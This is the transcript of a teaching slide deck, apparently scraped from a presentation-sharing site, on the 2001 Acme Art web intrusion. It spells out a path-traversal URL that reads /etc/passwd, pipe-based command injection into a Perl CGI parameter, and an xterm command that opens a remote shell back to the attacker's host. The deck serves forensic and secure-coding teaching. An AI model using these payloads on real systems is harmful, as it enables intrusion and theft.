Presentation is loading. Please wait.

Presentation is loading. Please wait.

Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 www.acme-art.com A hacker stole credit card numbers from the online store’s database.

Published byDelphia Fitzgerald Modified over 9 years ago

Similar presentations

Presentation on theme: "Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 www.acme-art.com A hacker stole credit card numbers from the online store’s database."— Presentation transcript:

1 Hacking Case Study Sungchul Hong

2 Acme Art, Inc. Case October 31, 2001 www.acme-art.com A hacker stole credit card numbers from the online store’s database. Firewall was installed Only port 80 and 443 were open Computer forensics teams found following;

3 Server Environment Apache 1.312 on Linux system Perl CGI script was used

4

5 Hacker is looking around web pages and clicking images

6

7 http://www.acme-art.com/idex.cgi?page=tahoe1.shtml

8 Hacker's Move HTTP://www.acme- art.com/index.cgi?page=index.cgi 10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] “GET /cgi-bin/ HTTP/1.0” 403 272 Hacker sees that index.cgi accepts a filename as a parameter and displays the contents of that filename. He uses index.cgi itself as a parameter to display its own source code

9 Vulnerability Revealed *** No parameter type checking *** Index.cgi page is revealed

10 Vulnerability The hacker guesses the system file name and its path. Then open it.

11 Error Message Reveals the programming secrete.

12

13 Hacker’s Next Move http://www.acme- art.com/index.cgi?page=/../../../../../../../../../etc/passwd (write the passwd file into the screen)

14 Message The entire contents of the /etc/passwd file are returned and displayed in the browser. Rootx0:0:root/root/bin/bash bin:x:1:1:bin/bin: daemonx:2:2:daemon:/sbin:admx3:4:adm:/var/ad m: lp:x4:7:lp:/var/spool/lpd: syncx:5:0:sync:/sbin/bin/sync/shutdown:x:6:0shut down:/sbin:shutdown halt:x:7:halt:/sbin/ …

15 Next Move The hacker uses the pipe character in the file parameter, followed by commands of his choice. Now instead of a file being opened, Perl opens a file handle, which receives the standard output generated by the commands specified in the file name parameter

16 Code ls –la / *reveals files in the root directory id /* get the process id for index.cgi which xterm /*path for xterminal (use hex ‘0A’ for line feed) Now hackers can run any commands on the Web server under the security privileges of the “nobody” account.

17 Use xterm to gain interactive shell access to the Web server. Xterm –display 10.0.1.21:210.0& (The xterm command launches an xterm window back to the attacker’s display on 10.0.1.21:0.0)

18 Hacker’s View Bash$ id Uid=99(nobody) gid=99(nobody) group=99(nobody) Bash$ pwd /usr/local/apache/htdocs Bash$

19 Note The attacker used port 80 (http port) Use only HTTP Firewall couldn’t help it. Lesson: –All the inputs must be checked. –Do not show unnecessary information.

Download ppt "Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 www.acme-art.com A hacker stole credit card numbers from the online store’s database."

Similar presentations

Adding Dynamic Content to your Web Site

Adding Dynamic Content to your Web Site
Csci5931 Web Security1 Case Study: A Forensic Lesson for Web Security (MSS, part one)

Csci5931 Web Security1 Case Study: A Forensic Lesson for Web Security (MSS, part one)
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
FILE TRANSFER PROTOCOL Short for File Transfer Protocol, the protocol for exchanging files over the Internet. FTP works in the same way as HTTP for transferring.

FILE TRANSFER PROTOCOL Short for File Transfer Protocol, the protocol for exchanging files over the Internet. FTP works in the same way as HTTP for transferring.
COEN 445 Communication Networks and Protocols Lab 4

COEN 445 Communication Networks and Protocols Lab 4
Introducing the Command Line CMSC 121 Introduction to UNIX Much of the material in these slides was taken from Dan Hood’s CMSC 121 Lecture Notes.

Introducing the Command Line CMSC 121 Introduction to UNIX Much of the material in these slides was taken from Dan Hood’s CMSC 121 Lecture Notes.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Creating WordPress Websites. Creating a site on your computer Local server Local WordPress installation Setting Up Dreamweaver.

Creating WordPress Websites. Creating a site on your computer Local server Local WordPress installation Setting Up Dreamweaver.
Chapter Apache Installation in Linux- Mandrake. Acknowledgment The following information has been obtained directly from www.mandrake.com www.mandrake.com.

Chapter Apache Installation in Linux- Mandrake. Acknowledgment The following information has been obtained directly from
CP476 Internet Computing Browser and Web Server 1 Web Browsers A client software program that allows you to access and view Web pages on the Internet –Examples.

CP476 Internet Computing Browser and Web Server 1 Web Browsers A client software program that allows you to access and view Web pages on the Internet –Examples.
Basic Unix Dr Tim Cutts Team Leader Systems Support Group Infrastructure Management Team.

Basic Unix Dr Tim Cutts Team Leader Systems Support Group Infrastructure Management Team.
CGI Programming: Part 1. What is CGI? CGI = Common Gateway Interface Provides a standardized way for web browsers to: –Call programs on a server. –Pass.

CGI Programming: Part 1. What is CGI? CGI = Common Gateway Interface Provides a standardized way for web browsers to: –Call programs on a server. –Pass.
Creating Web Page Forms

Creating Web Page Forms
Chapter 6: Hostile Code Guide to Computer Network Security.

Chapter 6: Hostile Code Guide to Computer Network Security.
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.

Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.
2 $ command Command Line Options ls –a –l hello hi Command Arguments.

2 $ command Command Line Options ls –a –l hello hi Command Arguments.
1 Web Developer & Design Foundations with XHTML Chapter 6 Key Concepts.

1 Web Developer & Design Foundations with XHTML Chapter 6 Key Concepts.
CGI Common Gateway Interface. CGI is the scheme to interface other programs to the Web Server.

CGI Common Gateway Interface. CGI is the scheme to interface other programs to the Web Server.
FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA1 Part 4 Web technologies: HTTP, CGI, PHP,Java applets)

FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA1 Part 4 Web technologies: HTTP, CGI, PHP,Java applets)
Chapter 9 Part II Linux Command Line Access to Linux Authenticated login using a Linux account is required to access a Linux system. The Linux prompt will.

Chapter 9 Part II Linux Command Line Access to Linux Authenticated login using a Linux account is required to access a Linux system. The Linux prompt will.

Similar presentations

Ads by Google